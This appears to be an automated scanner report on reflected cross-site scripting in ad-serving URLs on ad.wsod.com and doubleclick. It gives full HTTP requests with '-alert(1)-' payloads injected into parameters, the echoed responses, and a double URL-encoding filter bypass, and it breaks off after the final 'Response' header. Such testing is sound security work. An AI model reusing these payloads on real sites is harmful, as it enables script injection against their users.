GET /adj/N5506.MSN/B5070033.106;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/109000000000046462.1?!4e018"-alert(1)-"0e1e7727ec4&&PID=8173801&UIT=G&TargetID=8308244&AN=1932086037&PG=INVTXT&ASID=32a4b563435046c28be6af511bb98a83&destination=;ord=1932086037? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8012'-alert(1)-'4150aa4ae71 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849b8012'-alert(1)-'4150aa4ae71&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:00 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:00 GMT; path=/ Set-Cookie: i_1=33:1411:836:100:0:40771:1303843020:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:00 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 922
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849b8012'-alert(1)-'4150aa4ae71&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; }
The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b897'-alert(1)-'1221f18c50f was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!9b897'-alert(1)-'1221f18c50f&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:36:52 GMT; path=/ Set-Cookie: i_1=33:1411:992:100:0:40771:1303843012:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:36:52 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 910
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!9b897'-alert(1)-'1221f18c50f&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; ret ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54622'-alert(1)-'002a9baae46 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880654622'-alert(1)-'002a9baae46&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:16 GMT; path=/ Set-Cookie: i_1=33:1411:790:100:0:40771:1303843036:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:16 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 914
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880654622'-alert(1)-'002a9baae46&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { docum ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58bcb'-alert(1)-'b02bf13cdc7 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7458bcb'-alert(1)-'b02bf13cdc7 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:28 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:28 GMT; path=/ Set-Cookie: i_1=33:1411:49:100:0:40771:1303843048:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:28 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 924
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7458bcb'-alert(1)-'b02bf13cdc7'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { document.write('<a href="//ad.wsod.com/click/8bec9b10 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0a79'-alert(1)-'9ef692e406f was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa0a79'-alert(1)-'9ef692e406f&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:24 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:24 GMT; path=/ Set-Cookie: i_1=33:1411:794:100:0:40771:1303843044:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:24 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 922
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa0a79'-alert(1)-'9ef692e406f&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { document.write( ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5140d'-alert(1)-'366f24d7955 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=82312085140d'-alert(1)-'366f24d7955&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:12 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:12 GMT; path=/ Set-Cookie: i_1=33:1411:794:100:0:40771:1303843032:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:12 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 922
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=82312085140d'-alert(1)-'366f24d7955&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image14 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc7e5'-alert(1)-'6ddd018aaa was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Gdc7e5'-alert(1)-'6ddd018aaa&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:07 GMT; path=/ Set-Cookie: i_1=33:1411:972:100:0:40771:1303843027:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:07 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 913
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Gdc7e5'-alert(1)-'6ddd018aaa&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } func ...[SNIP]...
5.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82f30'-alert(1)-'9293594230b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&82f30'-alert(1)-'9293594230b=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:33 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:33 GMT; path=/ Set-Cookie: i_1=33:1411:972:100:0:40771:1303843053:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:33 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 917
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&82f30'-alert(1)-'9293594230b=1'; var iRM = new Image(); iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging'; return true; } function wsod_image1411() { document.write('<a href="//ad.wsod.com/click/8bec9b ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49585"-alert(1)-"9386b35fba was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=847984949585"-alert(1)-"9386b35fba&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:59 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92046"-alert(1)-"146c89c17b4 was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880692046"-alert(1)-"146c89c17b4&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:12 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79074"-alert(1)-"90cbbf22942 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7479074"-alert(1)-"90cbbf22942 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40e7"-alert(1)-"cba368c8dc7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa40e7"-alert(1)-"cba368c8dc7&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 600fc%2522%253balert%25281%2529%252f%252ff3cc9aebd4f was submitted in the REST URL parameter 2. This input was echoed as 600fc";alert(1)//f3cc9aebd4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357600fc%2522%253balert%25281%2529%252f%252ff3cc9aebd4f/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:37:28 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9bf5%2522%253balert%25281%2529%252f%252fb0a835980d5 was submitted in the REST URL parameter 3. This input was echoed as d9bf5";alert(1)//b0a835980d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60d9bf5%2522%253balert%25281%2529%252f%252fb0a835980d5/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L
Response
